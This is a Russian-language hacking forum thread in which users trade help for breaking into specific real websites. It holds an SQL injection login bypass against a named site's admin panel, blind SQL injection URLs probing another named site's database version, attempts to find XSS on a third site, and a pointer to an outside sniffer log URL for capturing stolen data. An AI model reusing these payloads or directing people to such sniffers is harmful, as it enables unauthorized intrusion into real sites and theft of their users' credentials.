Нет, там у всех так пасс выглядит, а когда я запрос составил чтоб пароль в др ячейку копировать то база сказала что не может копировать поле hide в text т.е. пароли имеют тип hide
2 truelamer Ты просто неудачную таблицу выбрал. В ней нет паролей ,что-то типа файла passwd в unix Если точнее, то системная таблица с информацией о юзерах P.S но версия Piflit мне тоже понравилась
Скажите что такое выдает сканер NRG что за уязвимости такие или что это? Найдено: http://XXX.kz/?PageServices Найдено: http://XXX.kz/?wp-cs-dump Найдено: http://XXX.kz/?wp-html-rend Найдено: http://XXX.kz/?wp-stop-ver Найдено: http://XXX.kz/?wp-uncheckout Найдено: http://XXX.kz/?wp-usr-prop Найдено: http://XXX.kz/?wp-ver-diff Найдено: http://XXX.kz/?wp-verify-link Найдено: http://XXX.kz/?wp-ver-info перехожу по этим ссылкам ни чего не происходит
http://agrealt.ru/admin/ тут в админке sql я так понял что пароль пустое поле а login какой? что то там запросы не составляются или я что то не правильно делаю
ага SELECT user_id FROM realto_base.users WHERE LOWER(user_login)="1" or 1=1/*" AND LOWER(user_pwd)="c1562365960602e0b66d39995ec882cf"; Table 'realto_base.users' doesn't exist сталобыть кто-то похерил админку, или админы кривые
Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается http://nkregion.kz/index.php?IDAdmin=test
Code: http://www.wingate.com/news.php?id=50'[/СODE] вроде есть скуль запросы типа выдают одну и ту же страницу [CODE] http://www.wingate.com/news.php?id=50-1 http://www.wingate.com/news.php?id=49 а с подзапросами что то странное твориться не одни не выполняться
как не выполняются? http://www.wingate.com/news.php?id=49%20and%20(select%201)=1 5ый мускул http://www.wingate.com/news.php?id=49%20and%20substring(version(),1,1)=5
это старые серверные уязвимости, не встречаются уже пару лет. даже не уязвимости, а фичи, показывающую инфу о серваке
2 truelamer на сайте есть намек на ХСС и даже возможно актив (хотя тут как посмотреть) http://nkregion.kz/board/index.php?fid=3&id=18252 Кликни на "Отправить письмо автору" там откроется окошко в котором ник, половина его нормальная а половина уже после тега курсив. Дальше не рыл.... просто не успел
Сниффер используй для перехвата данных. Можешь использовать этот сниффер: http://system32.name/sniff/log.php